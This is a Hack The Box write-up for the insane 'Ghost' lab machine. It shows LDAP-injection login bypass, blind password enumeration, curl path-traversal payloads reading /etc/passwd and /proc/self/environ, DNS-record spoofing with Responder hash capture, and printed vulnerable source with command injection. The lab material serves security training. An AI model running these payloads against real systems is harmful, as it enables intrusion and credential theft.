Ghost

Season 5 Last Machine — Insane

https://app.hackthebox.com/machines/ghost


In the name of Allah, the Most Gracious, the Most Merciful

This is my comprehensive walkthrough for solving Ghost, an insane Active Directory machine on Hack The Box. This box combined web exploitation, authentication bypass, container pivoting, Active Directory attacks, and domain trust abuse, making it a demanding yet highly rewarding challenge that closely mirrors real-world penetration testing scenarios.

We started with no credentials and multiple web applications hosted on the target, with no direct access to Active Directory services. Through virtual host fuzzing, we discovered Gitea and an intranet application, leading us to an LDAP injection vulnerability in the intranet site. This allowed us to authenticate and extract credentials for a Gitea user, granting access to source code for both Ghost blog custom features and the intranet application.

Analyzing the source code, we uncovered a Local File Inclusion (LFI) vulnerability in a Ghost CMS development feature, enabling us to retrieve environment variables containing the DEV_INTRANET_KEY. The intranet application also had a command injection vulnerability, which we exploited using the developer key to gain a reverse shell inside a containerized environment. Moving laterally between containers, we found an active Kerberos ticket, which we used to authenticate to the domain.

Further enumeration on the intranet site revealed a forum post disclosing a DNS misconfiguration, which we leveraged to perform DNS spoofing. This allowed us to capture a user’s NTLM hash, crack it, and discover that this user had ReadGMSAPassword privileges over ADFS_GMSA$. Extracting the password, we executed a Golden SAML attack, granting us federated authentication as an administrator and access to the core site.

Inside the core site, we discovered an SQL Server Query Debugger, which led us to a linked MSSQL server. Exploiting this link, we found that our user had impersonation privileges over sa, allowing us to gain a shell as NT SERVICE\MSSQLSERVER. From there, we leveraged SeImpersonatePrivilege for further escalation. Our compromised machine was in another domain that had a bidirectional trust with ghost.htb. This machine had DCSync privileges and was also a member of the Enterprise Domain Controllers group, granting us DS-Replication-Get-Changes privileges over GHOST.HTB. Using this, we performed a DCSync attack, extracting all domain hashes and achieving full control over the environment.

This machine required deep enumeration, precise chaining of vulnerabilities, and a solid understanding of Active Directory security concepts. Let’s dive into the details!

Reconnaissance

Network Scanning:



The Nmap scan reveals several interesting services running on the target machine, with a mix of Windows and Linux services.

A Windows domain controller DC01 for the ghost.htb domain, hosting services such as Kerberos, LDAP, SMB, and DNS.

Key findings include ports related to Active Directory (389/636 for LDAP, 88 for Kerberos, 445 for SMB), and RDP (3389).

Additionally, Microsoft SQL Server 2022 is running on port 1433, offering a potential target for exploitation.

The presence of a domain controller (DC01) and a Ghost-related application (port 8008) suggests that this is a domain-joined Windows machine with a web application running on a Linux VM.

We will focus on investigating the web application on port 8008 for vulnerabilities.

Let’s start by adding the domain to the hosts file for local resolution:

echo '10.10.11.24 ghost.htb dc01.ghost.htb' | sudo tee -a /etc/hosts

Service Enumeration:



1. SSL/TLS Certificate


openssl s_client -connect 10.10.11.24:3269 -showcerts

The certificate is self-signed, meaning the server is using its own authority to sign the certificate. The presence of federation.ghost.htb in the acceptable client certificate CA names suggests that the environment may be using Active Directory Federation Services (ADFS) for cross-domain authentication or identity management. Federation often involves single sign-on (SSO) systems, where multiple domains or systems authenticate users via a centralized identity provider.

Note: New subdomain to add to the hosts file for local resolution



2. Active Directory related services



In a typical Active Directory environment, enumeration often begins with LDAP and SMB to gather information such as users, shares, or other data that might aid in gaining initial access. However, for this machine, attempts to enumerate LDAP and SMB with null authentication yielded no significant information.

As a result, the presence of web services becomes a more promising target for enumeration and potential initial access.


ldapsearch -H ldap://10.10.11.24 -x -b "DC=ghost,DC=htb"


ldapsearch-ad -l 10.10.11.24 -t info

The same goes for SMB and RPC: null authentication is not allowed, so we get nothing from them.

3. For Web Services:

Always keep Burp Suite running in the background with the proxy enabled (interception off) while working with a web application, so that all traffic is logged and the requests can be reviewed after the enumeration process.

Port 80 (HTTP)

http://ghost.htb/ shows a custom IIS error page, the kind that appears when the site is stopped. Directory brute-forcing yielded no significant results on this port, so the proxy may not be listening on it.



Port 443 (HTTPS)

Nothing on this port: the server actively rejects or resets the connection. The HTTPS service on the target is either misconfigured, restricted, or not intended for public interaction.





Port 8443 (HTTPS, nginx, Ghost Core)

The main page redirects us to /login, which displays a button. Clicking the button redirects us to https://ghost.htb:8443/api/login, where we are redirected to SSO authentication via a federation service.


https://federation.ghost.htb/adfs/ls/?SAMLRequest=nVNNb6MwEP0ryPcA5qNLrJAqSw6N1N1FCe2hl5UxkwYJbOoZ2uy%2FX0HCNodtDrn6zbx58%2BZ5cX9sG%2BcdLNZGp4y7PrtfLlC2TSdWPR30Ft56QHKObaNRjEDKequFkVij0LIFFKTEbvXjUQSuLzpryCjTMGezTtnvMAjn32LOIQFfzSGCsrzjkYp54AdJxJMyjPcc4pA5z5OIwPWZs0HsYaORpKaUBX4Qz3w%2BC%2B4KnwvORei782T%2Bwpz8PO57ratav17XVp6KUDwURT7Lf%2B0K5qwBqdaSxtEHog6F5%2B2hAju%2Bua8Hg%2BQeqPRktUevQY85K0SwA5oZjX0Ldgf2vVbwtH385FDGwme3SKIoPFEMJnqdQdoCdkYjsJPjYtzZXlh9fRs5qWDLKzMX3gX3dNqfsoXNOjdNrf7cctpV05iPzIIkSBnZHpg3UZ8DA9UYn8xoguNN8clM20lb43AXOEpFk02XxFkjEbewv8W0q2VKqIEaUOQS8cPYakgaKIKqsFJjZyydrf2fnuUJ%2B8KOf%2BjlF1v%2BBQ%3D%3D&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=Gf3Nu%2FDoujvLeYQiNZYzw2H5da%2F7HhfVCqSnLr5QxfL%2Bzj%2BaZRJrPJAOk3gsKdpD1LXQbkMramPzhbqZPTSjl38itou26lCMbRQTZOXAecX8dhQFlzR%2BYTGg3Diw8%2FC549xL98MykEQYPyByVxib9%2FUqRyYUnFz6YQshUOLdhhH%2BaMmPm2W2BWSpsH70ZRA0HFbSU0AEdl3RhQ6VUD8g3nysfo07v%2BAysySZz5fDg4C5loOscUZaonBgXbAqxmuWaccwdxIzRckRUdrd7J22Xa%2BL6CQmgH2Bv3b%2BYXldScRknP8CuS8YjSbp2n99ld2hAsG46za0J8OY9NJFodVmxA%3D%3D

The request to https://federation.ghost.htb/adfs/ls/ leads to the normal AD FS sign-in page, which requires credentials to log in. We only have the SAML request from the redirection to decode.

SAML request

nVNNb6MwEP0ryPcA5qNLrJAqSw6N1N1FCe2hl5UxkwYJbOoZ2uy%2FX0HCNodtDrn6zbx58%2BZ5cX9sG%2BcdLNZGp4y7PrtfLlC2TSdWPR30Ft56QHKObaNRjEDKequFkVij0LIFFKTEbvXjUQSuLzpryCjTMGezTtnvMAjn32LOIQFfzSGCsrzjkYp54AdJxJMyjPcc4pA5z5OIwPWZs0HsYaORpKaUBX4Qz3w%2BC%2B4KnwvORei782T%2Bwpz8PO57ratav17XVp6KUDwURT7Lf%2B0K5qwBqdaSxtEHog6F5%2B2hAju%2Bua8Hg%2BQeqPRktUevQY85K0SwA5oZjX0Ldgf2vVbwtH385FDGwme3SKIoPFEMJnqdQdoCdkYjsJPjYtzZXlh9fRs5qWDLKzMX3gX3dNqfsoXNOjdNrf7cctpV05iPzIIkSBnZHpg3UZ8DA9UYn8xoguNN8clM20lb43AXOEpFk02XxFkjEbewv8W0q2VKqIEaUOQS8cPYakgaKIKqsFJjZyydrf2fnuUJ%2B8KOf%2BjlF1v%2BBQ%3D%3D

Using this saml-parser, the decoded SAML request is as follows


<samlp:AuthnRequest

xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"

ID="_32397511e8e0c9e4ebb614c512028418b35f1e53"

Version="2.0"

IssueInstant="2025-01-26T01:11:30.989Z"

ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"

Destination="https://federation.ghost.htb/adfs/ls/"

AssertionConsumerServiceURL="https://core.ghost.htb:8443/adfs/saml/postResponse">

<saml:Issuer

xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://core.ghost.htb:8443</saml:Issuer>

<samlp:NameIDPolicy

xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"

AllowCreate="true" />

<samlp:RequestedAuthnContext

xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"

Comparison="exact">

<saml:AuthnContextClassRef

xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>

</samlp:RequestedAuthnContext>

</samlp:AuthnRequest>

We discovered a new subdomain https://core.ghost.htb:8443, so add it to the hosts file. Upon visiting it, it appears to display the same page as the index page on port 8443.

Nothing more to do here for now.
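The decoding done by the online parser can also be reproduced locally. The sketch below assumes the usual HTTP-Redirect encoding of the SAMLRequest parameter (URL-encoding, then Base64, then raw DEFLATE); decode_saml_request and encode_saml_request are hypothetical helper names, and the encoder exists only so the example is self-contained.

```python
import base64
import zlib
from urllib.parse import unquote


def decode_saml_request(param: str) -> str:
    """Decode a SAMLRequest query parameter into its XML text."""
    raw = base64.b64decode(unquote(param))
    # wbits=-15 selects raw DEFLATE (no zlib header or checksum).
    return zlib.decompress(raw, -15).decode("utf-8")


def encode_saml_request(xml: str) -> str:
    """Inverse operation, used here only to build a demo value."""
    compressor = zlib.compressobj(wbits=-15)
    deflated = compressor.compress(xml.encode("utf-8")) + compressor.flush()
    return base64.b64encode(deflated).decode("ascii")


if __name__ == "__main__":
    sample = '<samlp:AuthnRequest Destination="https://federation.ghost.htb/adfs/ls/"/>'
    print(decode_saml_request(encode_saml_request(sample)))
```

Passing the SAMLRequest value from the redirect URL to decode_saml_request should yield the same XML as the parser output shown above.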





Port 8008 (HTTP, nginx, Ghost CMS)

The index page shows only a single post, a useless search function, and a footer with Powered by Ghost indicating the site is using the Ghost blogging platform.

Ghost CMS is an open-source blogging platform for professional publishers to create, share, and grow a business around their content.

http://ghost.htb:8008/embarking-on-the-supernatural-journey-welcome-to-ghost/




Nothing interesting in the post — seems to be the default post from the platform. After that, I checked the robots.txt file

http://ghost.htb:8008/robots.txt




Upon reviewing the directories listed there, one of them stood out: the /ghost/ directory. This directory is a login page for the Ghost CMS.

Content & Directory Enumeration





In this step, I decided to start directory brute-forcing using a common directory wordlist.

Gobuster errored out as soon as it started, because the server returns a 301 (Moved Permanently) status code for non-existent URLs. This is a way to hinder directory enumeration, since it makes existing and non-existing paths harder to tell apart. We can work around it by listing the status codes we care about (-s), clearing the default status-code blacklist (-b ""), and appending a trailing slash to every request (-f):

gobuster dir -u "http://ghost.htb:8008" -t 50 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -s "200,204,302,307,401,403" -f -b ""





Nothing interesting was found, so I decided to create a custom wordlist for Ghost. Since Ghost is open source, one is easy to generate; Ghost-CMS-wordlist explains how to build a custom wordlist for open-source tools.

Using the custom wordlist that has been created:

gobuster dir -u "http://ghost.htb:8008" -t 50 -w Ghost_wordlist -s "200,204,302,307,401,403" -f -b ""

But once again, nothing important was found as it requires GHOST CMS authentication. After some enumeration with no progress, I decided to start VHOST fuzzing.



Subdomain & Virtual Host Enumeration

INFO: VHOST(Virtual Host) refers to the practice of running more than one website (such as company1.example.com and company2.example.com) on a single machine.


ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H 'Host: FUZZ.ghost.htb' -u http://10.10.11.24:8008 -t 200 -fs 7676,0

The first subdomain was invalid, just a reflection of the main site (http://ghost.htb:8008). I added the other two subdomains to the hosts file for further checking.
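The size filter used in the ffuf command can be sketched in Python. This is an illustration under assumptions, not how ffuf works internally: find_vhosts and http_probe are hypothetical helper names, and the ignored sizes 7676 and 0 are simply the -fs values from the command above.

```python
import http.client
from typing import Callable, Iterable


def http_probe(host: str, ip: str = "10.10.11.24", port: int = 8008) -> int:
    """Request / from the target IP with a custom Host header; return the body size."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    try:
        conn.request("GET", "/", headers={"Host": host})
        return len(conn.getresponse().read())
    finally:
        conn.close()


def find_vhosts(
    words: Iterable[str],
    probe: Callable[[str], int] = http_probe,
    domain: str = "ghost.htb",
    ignored_sizes: frozenset = frozenset({7676, 0}),
) -> list:
    """Return hostnames whose response size is not one of the filtered sizes."""
    hits = []
    for word in words:
        host = f"{word}.{domain}"
        if probe(host) not in ignored_sizes:
            hits.append(host)
    return hits
```

The probe is passed in as a parameter so the filtering logic can be tried offline with a fake function before pointing it at the lab.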

Gitea subdoamin

Gitea is a lightweight, self-hosted Git service that provides version control, issue tracking, and code collaboration features. It is open-source and designed for ease of installation and minimal resource consumption

Two pages

- Sign in page Gitea does not come with default credentials, and we do not have any credentials yet

http://gitea.ghost.htb:8008/user/login

http://gitea.ghost.htb:8008/user/login - Explore Page For exploring users, repositories, and organizations. No public repositories or organizations found



But we identified two users

But we identified two users  Both users are valid, So make a list of these users for future use

Both users are valid, So make a list of these users for future use gitea_temp_principal,cassandra.shelto1



kerbrute_linux_amd64 userenum --dc 10.10.11.24 -d ghost.htb users_list

Nothing to do without cred unless we find exploit for the Gitea Version 1.21.3

Nothing to do without cred unless we find exploit for the Gitea Version 1.21.3



Intranet subdomain

http://intranet.ghost.htb:8008/login

Another login page, and once more we have nothing promising to use against it.

Exploitation









While exploring the Burp Suite traffic logs, I found this request:

The form contains fields such as ldap-username and ldap-secret, suggesting an interaction with an LDAP server. If these fields are improperly validated, there could be opportunities for LDAP injection attacks.

LDAP Injection cheat sheet from PayloadsAllTheThings

LDAP Injection occurs when an application fails to properly sanitize user input before including it in an LDAP query. This vulnerability allows attackers to manipulate the LDAP query structure, potentially bypassing authentication or accessing unauthorized data. For example, injecting * in a username field may match all users due to the wildcard nature of * in LDAP queries. Additionally, blind LDAP injection can be used to infer valid credentials by observing application behavior or response times after submitting crafted queries, enabling password enumeration or brute-force attacks.



To test for LDAP injection, payloads were injected into the ldap-username or ldap-secret fields to evaluate the authentication mechanism.

- When wrong credentials were submitted, the application returned a 200 OK response with this error message:

    0: [ "$@1", [ "cprT2WY1sZ8jzOGNk7ojt", null] ]
    1: { "error": "Invalid combination of username and secret" }

- However, injecting * into the fields resulted in a 303 See Other response that included a Set-Cookie header with a token, indicating vulnerability to LDAP injection.

Using * in both the user and secret fields, we were able to authenticate as the first user returned, which is kathryn.holland.

According to the news page, domain authentication to Gitea is disabled; only gitea_temp_principal can be used. Also, add the Bitbucket subdomain to the hosts file, since we may need it later.

As mentioned above, the vulnerable service to LDAP injection does not only grant us authentication bypass but also allows us to enumerate user passwords blindly based on behavior, similar to blind SQL injection.

So, I made a simple script to automate this process. You can check it here: ghost.htb

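This script relies on LDAP wildcard matching rather than a true regex: it authenticates with a known prefix followed by a candidate character and * as the secret, keeps each character that results in a successful login, and repeats until the full password is enumerated.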
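The core loop of such a script can be sketched as follows. This is not the script linked above but a minimal illustration under assumptions: login_ok stands for whatever request tells a successful login (303) from a failed one (200), make_fake_oracle is a hypothetical stand-in that emulates prefix matching offline, and the character set is assumed to be lowercase letters and digits.

```python
import string
from typing import Callable

# '*' and other filter metacharacters are deliberately left out of the candidates.
CHARSET = string.ascii_lowercase + string.digits


def recover_secret(
    login_ok: Callable[[str], bool],
    charset: str = CHARSET,
    max_len: int = 64,
) -> str:
    """Recover a secret one character at a time through a wildcard oracle."""
    known = ""
    while len(known) < max_len:
        for ch in charset:
            if login_ok(known + ch + "*"):
                known += ch
                break
        else:
            # No candidate extends the prefix, so the secret is complete.
            break
    return known


def make_fake_oracle(secret: str) -> Callable[[str], bool]:
    """Offline stand-in for the login request: emulates 'prefix*' matching."""
    def login_ok(pattern: str) -> bool:
        if pattern.endswith("*"):
            return secret.startswith(pattern[:-1])
        return secret == pattern
    return login_ok


if __name__ == "__main__":
    print(recover_secret(make_fake_oracle("s3cr3t")))
```

Against the real target, login_ok would submit the pattern in the ldap-secret field with the chosen username and report whether the response was the 303 redirect.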

We now have a valid password for the gitea_temp_principal user.



While enumerating the other pages of the intranet site, save the usernames to a file for later.

DNS Spoofing





On the Forum page, a post indicates that the migration to Bitbucket is incomplete and that its DNS entry, bitbucket.ghost.htb, has not been configured. This misconfiguration presents an opportunity for DNS spoofing: by adding the missing DNS record ourselves, we can redirect traffic intended for Bitbucket to our machine, where we set up a listener. Since a script running in the environment checks pipeline results, we could capture its authentication requests, potentially intercepting NTLM hashes, API keys, or even plaintext credentials. We will use dnstool.py from krbrelayx to add the DNS record.

Setup listener


sudo responder -I tun0



Add a DNS record for bitbucket.ghost.htb pointing to our IP, using the credentials we obtained earlier:

python3 dnstool.py -u GHOST.HTB\\gitea_temp_principal -p 'szrr8kpc3z6onlqf' GHOST.HTB -r bitbucket.ghost.htb -a add -d 10.10.16.44 -dns-ip 10.10.11.24

The bind failed with the credentials we have, which makes sense because this account is only meant for Gitea. I will leave this step for later, when we gain valid domain credentials. For now, I will use these credentials to authenticate to Gitea.





We have two repositories

Blog Repository

Only one commit; there are no older commits to check.

- Public API key a5af628828958c976a3b6cc81a

Reviewing posts-public.js:

    const models = require('../../models');
    const tpl = require('@tryghost/tpl');
    const errors = require('@tryghost/errors');
    const {mapQuery} = require('@tryghost/mongo-utils');
    const postsPublicService = require('../../services/posts-public');
    const getPostServiceInstance = require('../../services/posts/posts-service');
    const postsService = getPostServiceInstance();

    const allowedIncludes = ['tags', 'authors', 'tiers', 'sentiment'];

    const messages = {
        postNotFound: 'Post not found.'
    };

    const rejectPrivateFieldsTransformer = input => mapQuery(input, function (value, key) {
        const lowerCaseKey = key.toLowerCase();
        if (lowerCaseKey.startsWith('authors.password') || lowerCaseKey.startsWith('authors.email')) {
            return;
        }

        return {
            [key]: value
        };
    });

    function generateOptionsData(frame, options) {
        return options.reduce((memo, option) => {
            let value = frame.options?.[option];

            if (['include', 'fields', 'formats'].includes(option) && typeof value === 'string') {
                value = value.split(',').sort();
            }

            if (option === 'page') {
                value = value || 1;
            }

            return {
                ...memo,
                [option]: value
            };
        }, {});
    }

    function generateAuthData(frame) {
        if (frame.options?.context?.member) {
            return {
                free: frame.options?.context?.member.status === 'free',
                tiers: frame.options?.context?.member.products?.map((product) => {
                    return product.slug;
                }).sort()
            };
        }
    }

    module.exports = {
        docName: 'posts',

        browse: {
            headers: {
                cacheInvalidate: false
            },
            cache: postsPublicService.api?.cache,
            generateCacheKeyData(frame) {
                return {
                    options: generateOptionsData(frame, [
                        'include', 'filter', 'fields', 'formats', 'limit',
                        'order', 'page', 'absolute_urls', 'collection'
                    ]),
                    auth: generateAuthData(frame),
                    method: 'browse'
                };
            },
            options: [
                'include', 'filter', 'fields', 'formats', 'limit',
                'order', 'page', 'debug', 'absolute_urls', 'collection'
            ],
            validation: {
                options: {
                    include: {
                        values: allowedIncludes
                    },
                    formats: {
                        values: models.Post.allowedFormats
                    }
                }
            },
            permissions: true,
            async query(frame) {
                const options = {
                    ...frame.options,
                    mongoTransformer: rejectPrivateFieldsTransformer
                };
                const posts = await postsService.browsePosts(options);
                const extra = frame.original.query?.extra;
                if (extra) {
                    const fs = require("fs");
                    if (fs.existsSync(extra)) {
                        const fileContent = fs.readFileSync("/var/lib/ghost/extra/" + extra, { encoding: "utf8" });
                        posts.meta.extra = { [extra]: fileContent };
                    }
                }
                return posts;
            }
        },

        read: {
            headers: {
                cacheInvalidate: false
            },
            cache: postsPublicService.api?.cache,
            generateCacheKeyData(frame) {
                return {
                    options: generateOptionsData(frame, [
                        'include', 'fields', 'formats', 'absolute_urls'
                    ]),
                    auth: generateAuthData(frame),
                    method: 'read',
                    identifier: {
                        id: frame.data.id,
                        slug: frame.data.slug,
                        uuid: frame.data.uuid
                    }
                };
            },
            options: ['include', 'fields', 'formats', 'debug', 'absolute_urls'],
            data: ['id', 'slug', 'uuid'],
            validation: {
                options: {
                    include: {
                        values: allowedIncludes
                    },
                    formats: {
                        values: models.Post.allowedFormats
                    }
                }
            },
            permissions: true,
            query(frame) {
                const options = {
                    ...frame.options,
                    mongoTransformer: rejectPrivateFieldsTransformer
                };
                return models.Post.findOne(frame.data, options)
                    .then((model) => {
                        if (!model) {
                            throw new errors.NotFoundError({
                                message: tpl(messages.postNotFound)
                            });
                        }
                        return model;
                    });
            }
        }
    };

This code snippet is vulnerable to Local File Inclusion (LFI) because the extra parameter is passed directly into fs.existsSync(extra) and fs.readFileSync("/var/lib/ghost/extra/" + extra). Since we control extra, we may be able to read arbitrary files on the system.

    if (extra) {
        const fs = require("fs");
        if (fs.existsSync(extra)) {
            const fileContent = fs.readFileSync("/var/lib/ghost/extra/" + extra, { encoding: "utf8" });
            posts.meta.extra = { [extra]: fileContent };
        }
    }
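To see why plain string concatenation is dangerous here, the small Python sketch below resolves the concatenated path lexically. It only illustrates the path arithmetic and is not part of the Ghost code; resolve_extra and is_inside_base are hypothetical names, and the containment check is one possible guard the handler lacks.

```python
import posixpath

# Directory the handler prepends to the user-supplied value.
BASE_DIR = "/var/lib/ghost/extra/"


def resolve_extra(extra: str) -> str:
    """Return the path the concatenation points to once '..' segments collapse."""
    return posixpath.normpath(BASE_DIR + extra)


def is_inside_base(extra: str) -> bool:
    """Containment check: does the resolved path stay under BASE_DIR?"""
    return resolve_extra(extra).startswith(BASE_DIR)


if __name__ == "__main__":
    for candidate in ("notes.txt", "../../../../etc/passwd"):
        print(candidate, "->", resolve_extra(candidate), is_inside_base(candidate))
```

Four ../ segments are enough to climb out of /var/lib/ghost/extra/ to the filesystem root, which is why the payloads in this section start with ../../../../.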

Here is the documentation of Ghost API

Ghost Content API Documentation

Crafting our payload

- Base URL: http://ghost.htb:8008/ghost/api/content/

- Route: posts (from the code)

- Parameter: extra

- Key: key=a5af628828958c976a3b6cc81a

curl -s "http://ghost.htb:8008/ghost/api/content/posts/?extra=../../../../etc/passwd&key=a5af628828958c976a3b6cc81a" | jq '.meta.extra'

We now have LFI. At this point, there are many files to explore, such as configuration files, SSH keys, etc. However, the first thing I do when I have LFI is read the /proc/self/ files to check the current process’s running command and its environment variables for credentials or secrets.

curl -s "http://ghost.htb:8008/ghost/api/content/posts/?extra=../../../../proc/self/environ&key=a5af628828958c976a3b6cc81a" | jq '.meta.extra'

For a cleaner version with the null bytes replaced by spaces:

curl -s "http://ghost.htb:8008/ghost/api/content/posts/?extra=../../../../proc/self/environ&key=a5af628828958c976a3b6cc81a" | jq -r '.meta.extra."../../../../proc/self/environ" | gsub("\\u0000"; " ")'

output

HOSTNAME=26ae7990f3dd database__debug=false YARN_VERSION=1.22.19 PWD=/var/lib/ghost NODE_ENV=production database__connection__filename=content/data/ghost.db HOME=/home/node database__client=sqlite3 url=http://ghost.htb DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe database__useNullAsDefault=true GHOST_CONTENT=/var/lib/ghost/content SHLVL=0 GHOST_CLI_VERSION=1.25.3 GHOST_INSTALL=/var/lib/ghost PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin NODE_VERSION=18.19.0 GHOST_VERSION=5.78.0

We obtained DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe; note it for later. After searching through configuration files and SSH keys for a while without finding anything, I decided to move on to the next repository.
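As an alternative to the jq one-liner, the raw /proc/self/environ content can be split into a dictionary. A minimal sketch, assuming the value returned by the API still contains the NUL separators; parse_environ is a hypothetical helper name.

```python
def parse_environ(raw: str) -> dict:
    """Split the NUL-separated content of /proc/<pid>/environ into a dict."""
    env = {}
    for entry in raw.split("\x00"):
        if "=" in entry:
            # Split on the first '=' only, since values may contain '=' too.
            name, value = entry.split("=", 1)
            env[name] = value
    return env


if __name__ == "__main__":
    sample = "NODE_ENV=production\x00PWD=/var/lib/ghost\x00GHOST_VERSION=5.78.0\x00"
    for name, value in parse_environ(sample).items():
        print(f"{name} = {value}")
```

Looking up a single variable such as DEV_INTRANET_KEY then becomes a dictionary access instead of scanning one long line.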

Intranet Repository

After some searching within the application files, I found two promising files, and the third file contained the vulnerable login function for LDAP injection we exploited earlier.

The first file handles the logic for requests related to the new feature.

    use rocket::http::Status;
    use rocket::Request;
    use rocket::request::{FromRequest, Outcome};

    pub(crate) mod scan;

    pub struct DevGuard;

    #[rocket::async_trait]
    impl<'r> FromRequest<'r> for DevGuard {
        type Error = ();

        async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
            let key = request.headers().get_one("X-DEV-INTRANET-KEY");
            match key {
                Some(key) => {
                    if key == std::env::var("DEV_INTRANET_KEY").unwrap() {
                        Outcome::Success(DevGuard {})
                    } else {
                        Outcome::Error((Status::Unauthorized, ()))
                    }
                },
                None => Outcome::Error((Status::Unauthorized, ()))
            }
        }
    }

You can find this block of code at dev.rs

This function checks whether the request contains a valid developer key in the X-DEV-INTRANET-KEY header. If the key matches the value stored in the environment variable DEV_INTRANET_KEY, the request is allowed; otherwise, it is rejected with an Unauthorized HTTP status.

Recalling the DEV_INTRANET_KEY obtained earlier from the LFI on the Ghost main app, we can use it here for authentication.

The second file contains a handler function for a POST request at the /scan route, which processes a request containing a URL, runs a command to check if the URL is safe, and returns the result.

    use std::process::Command;
    use rocket::serde::json::Json;
    use rocket::serde::Serialize;
    use serde::Deserialize;
    use crate::api::dev::DevGuard;

    #[derive(Deserialize)]
    pub struct ScanRequest {
        url: String,
    }

    #[derive(Serialize)]
    pub struct ScanResponse {
        is_safe: bool,
        // remove the following once the route is stable
        temp_command_success: bool,
        temp_command_stdout: String,
        temp_command_stderr: String,
    }

    // Scans an url inside a blog post
    // This will be called by the blog to ensure all URLs in posts are safe
    #[post("/scan", format = "json", data = "<data>")]
    pub fn scan(_guard: DevGuard, data: Json<ScanRequest>) -> Json<ScanResponse> {
        // currently intranet_url_check is not implemented,
        // but the route exists for future compatibility with the blog
        let result = Command::new("bash")
            .arg("-c")
            .arg(format!("intranet_url_check {}", data.url))
            .output();

        match result {
            Ok(output) => {
                Json(ScanResponse {
                    is_safe: true,
                    temp_command_success: true,
                    temp_command_stdout: String::from_utf8(output.stdout).unwrap_or("".to_string()),
                    temp_command_stderr: String::from_utf8(output.stderr).unwrap_or("".to_string()),
                })
            }
            Err(_) => Json(ScanResponse {
                is_safe: true,
                temp_command_success: false,
                temp_command_stdout: "".to_string(),
                temp_command_stderr: "".to_string(),
            })
        }
    }

You can find this block of code at scan.rs

The vulnerability here lies in the use of Command::new("bash") with user input: data.url from the ScanRequest is inserted directly into the bash command using format!("intranet_url_check {}", data.url) without any sanitization or escaping. By exploiting this, we can execute system-level commands.

    let result = Command::new("bash")
        .arg("-c")
        .arg(format!("intranet_url_check {}", data.url))
        .output();
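The effect of that format! call can be mimicked in a few lines of Python. This is only an illustration of the string that reaches bash -c, not the application's code; vulnerable_command and quoted_command are hypothetical names, and shell quoting is shown as one possible mitigation.

```python
import shlex


def vulnerable_command(url: str) -> str:
    """Mirror of format!("intranet_url_check {}", data.url): no escaping at all."""
    return f"intranet_url_check {url}"


def quoted_command(url: str) -> str:
    """Same command with the URL quoted so the shell sees it as a single word."""
    return f"intranet_url_check {shlex.quote(url)}"


if __name__ == "__main__":
    payload = "https://test.com; whoami"
    print(vulnerable_command(payload))  # the ';' ends the first command
    print(quoted_command(payload))      # the whole payload stays one argument
```

In the unquoted version the shell treats everything after ; as a second command, which is exactly what the payloads in the next section rely on.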

The third file contains the function responsible for the LDAP injection we performed earlier.

    use ldap3::{Scope, SearchEntry};
    use rocket::http::{Cookie, CookieJar};
    use rocket::serde::json::Json;
    use time::{Duration, OffsetDateTime};
    use crate::api::{ldap_error, route_error, RouteErrorRocket, RouteErrorType, LoginRequest, UserClaim};
    use crate::api::ldap::ldap_bind;

    async fn ldap_connect(username: &String, secret: &String) -> anyhow::Result<String, RouteErrorRocket> {
        let mut ldap = ldap_bind().await?;

        let dn = "CN=Users,DC=ghost,DC=htb";
        let (mut rs, _res) = ldap
            .search(
                &dn,
                Scope::Subtree,
                &format!("(&(displayName={})(intranetSecret={}))", username, secret),
                vec!["intranetSecret", "sAMAccountName"],
            )
            .await.or(Err(route_error(RouteErrorType::Unknown)))?
            .success().or_else(ldap_error)?;

        ldap.unbind().await.ok();

        if rs.is_empty() {
            return Err(route_error(RouteErrorType::NotFound));
        }

        let entry = SearchEntry::construct(rs.remove(0));
        match entry.attrs.get("sAMAccountName") {
            Some(values) => match values.get(0) {
                Some(username) => Ok(username.clone()),
                None => Err(route_error(RouteErrorType::Unknown))
            }
            None => Err(route_error(RouteErrorType::Unknown))
        }
    }

    #[post("/login", data = "<body>")]
    pub async fn login(body: Json<LoginRequest>, cookies: &CookieJar<'_>) -> anyhow::Result<(), RouteErrorRocket> {
        let username = ldap_connect(&body.ldap_username, &body.ldap_secret).await?;

        let claim = UserClaim::sign(UserClaim {
            username: username.to_string(),
        });

        let mut cookie = Cookie::new("token", format!("Bearer {}", claim));

        let mut now = OffsetDateTime::now_utc();
        now += Duration::days(1);
        cookie.set_expires(now);

        cookies.add(cookie);

        Ok(())
    }

You can find this block of code at login.rs

The lack of input sanitization in the ldap_connect function, specifically in how the username and secret are used in the LDAP search query, allows us to manipulate the username or secret values. The code builds the LDAP search query using string formatting, directly embedding the username and secret variables:

    &format!("(&(displayName={})(intranetSecret={}))", username, secret)

This allowed us to inject arbitrary LDAP filter syntax, bypass authentication, and perform unauthorized queries.
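The same filter construction can be reproduced in Python to show what the server ends up searching for. A sketch under assumptions: build_filter mirrors the format! call, while escape_filter_value is a hypothetical helper applying the RFC 4515 escapes that the original code omits.

```python
def build_filter(username: str, secret: str) -> str:
    """Mirror of the format! call in login.rs (no escaping)."""
    return f"(&(displayName={username})(intranetSecret={secret}))"


# RFC 4515 escapes for characters that are special inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value so it is treated as literal text."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


if __name__ == "__main__":
    # Unescaped wildcards match any user that has both attributes set.
    print(build_filter("*", "*"))
    # Escaped, the same input only matches a literal asterisk.
    print(build_filter(escape_filter_value("*"), escape_filter_value("*")))
```

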